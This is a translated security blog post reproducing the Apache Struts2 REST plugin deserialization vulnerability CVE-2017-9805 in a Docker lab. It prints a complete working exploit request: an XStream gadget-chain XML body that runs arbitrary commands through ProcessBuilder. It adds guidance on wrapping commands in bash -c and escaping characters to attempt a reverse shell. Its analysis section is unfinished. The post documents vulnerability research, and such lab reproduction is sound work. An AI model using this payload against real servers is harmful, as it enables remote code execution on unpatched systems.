Author: 手机用户2502922177 | Source: Internet | 2023-09-03 17:35
A new vulnerability was published the day before yesterday. Struts vulnerabilities have come out regularly before, with one as recently as March this year, but I had never followed up on this class of bug, so today I want to reproduce it and, at the same time, set up an environment to analyze why the vulnerability exists.
0x01 Vulnerability overview
Background: on September 5, 2017, Apache published an advisory stating that the REST plugin of Apache Struts2 contains a high-severity remote code execution vulnerability, assigned CVE-2017-9805. The flaw is an XStream deserialization vulnerability in the Struts2 REST plugin: XStreamHandler deserializes the request body with an XStream instance without validating the content (the types it is asked to instantiate), so a remote attacker who can send an XML body to a REST endpoint can execute arbitrary code on the server.
0x02 Environment setup

| env | version |
|---|---|
| docker base image (ubuntu) | 16.04 |
| jdk | 1.8.0_144 |
| struts source | 2.5.12 |
| tomcat | 8.0.46 |

Download the corresponding packages directly from the official sites.
0x1 Dockerfile

```dockerfile
FROM ubuntu:16.04
MAINTAINER 4t10n <act01n@163.com>

ENV DEBIAN_FRONTEND noninteractive
# switch to a domestic mirror, then install unzip (for struts.zip) and net-tools
RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt-get update -y \
    && apt-get install -y unzip \
    && apt-get install -y net-tools
WORKDIR /tmp
COPY ./apache-tomcat-8.0.46.tar.gz /tmp/
COPY ./jdk.tar.gz /tmp/
COPY ./struts.zip /tmp/
COPY ./cmd.sh /tmp/
RUN chmod a+x cmd.sh
EXPOSE 8080
CMD ["/bin/bash", "/tmp/cmd.sh"]
```
cmd.sh

```bash
#!/bin/bash
# unpack the JDK and Tomcat into /usr/local
tar -xz -f jdk.tar.gz -C /usr/local/
tar -xz -f apache-tomcat-8.0.46.tar.gz -C /usr/local/
# unpack the Struts distribution and deploy the REST showcase war into webapps/,
# where Tomcat serves it as /struts2-rest-showcase
unzip struts.zip -d /usr/local/apache-tomcat-8.0.46/webapps
mv /usr/local/apache-tomcat-8.0.46/webapps/struts-2.5.12/apps/struts2-rest-showcase.war /usr/local/apache-tomcat-8.0.46/webapps/

# setup jdk
cat >> /etc/profile <<'EOF'
JAVA_HOME=/usr/local/jdk1.8.0_144
JAVA_BIN=/usr/local/jdk1.8.0_144/bin
PATH=$PATH:$JAVA_BIN
CLASSPATH=$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar
export JAVA_HOME JAVA_BIN PATH CLASSPATH
EOF
source /etc/profile
# start Tomcat, then keep the container alive with an interactive shell
/usr/local/apache-tomcat-8.0.46/bin/startup.sh
/bin/bash
```
The related files are on GitHub. Build the image from that directory and run it with container port 8080 published on the host; the request below assumes it was published on 192.168.43.165:8989.
0x2 Attack code
This request only creates a file, /home/4ct10n, inside the container (a `touch` as the command run by ProcessBuilder). The XML body is shown re-indented for readability; when you send it, Content-Length must equal the actual byte length of the body you send.
```http
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: 192.168.43.165:8989
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.165:8989/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=31A64A6CF6021DA63449D6DDEF10202F
Connection: close
Content-Type: application/xml
Content-Length: 1656

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>/usr/bin/touch</string>
                        <string>/home/4ct10n</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
```
0x3 Follow-up on the attack
In fact, during real testing I had already noticed that some commands were restricted, but I did not look into it at the time. Today I glanced at a FreeBuf article which shows that arbitrary commands can now be executed; the link is here.
I tried it here as well, including the other commands mentioned in that article, but the reverse shell was the only one that did not work.
The article's main approach is to run the command through `bash -c`, so that the shell, rather than ProcessBuilder, handles redirections and pipes (ProcessBuilder passes each `<string>` to the program as one literal argv element and does no shell parsing).
The exact form is as follows. Note that any `<` or `&` inside the command text must be XML-escaped (`&lt;`, `&amp;`) or the body fails to parse before anything runs; a bare `>` as in this example is allowed in XML text, but a reverse shell's `>&` redirection contains an `&`.
```xml
<command>
  <string>bash</string>
  <string>-c</string>
  <string>echo asd >/tmp/4ct10n</string>
</command>
```
How to get the reverse shell back...... waiting online for an answer.
0x03 Vulnerability analysis
To be continued.